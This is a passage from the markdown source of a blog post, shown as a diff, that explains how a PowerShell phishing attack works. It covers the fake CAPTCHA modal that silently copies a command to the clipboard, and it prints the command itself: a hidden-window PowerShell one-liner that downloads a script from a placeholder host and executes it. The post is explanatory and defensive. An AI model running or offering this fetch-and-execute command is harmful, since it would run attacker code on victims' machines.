LitoMore/litomore.me/content/posts/2024-10-29-how-does-the-powershell-phishing-attack-work.md

 }
 ```

 It creates a phishing modal and uses [execCommand("copy")] to secretly copy a command to your clipboard.
+Browsers cannot automatically copy texts to the user's clipboard.
+This requires the user's interaction, so there is a CAPTCHA here.
 Let's see what the command does:

 ```powershell
 powershell -WindowStyle Hidden ([ScriptBlock]::Create((irm https://example.com/scam))).Invoke()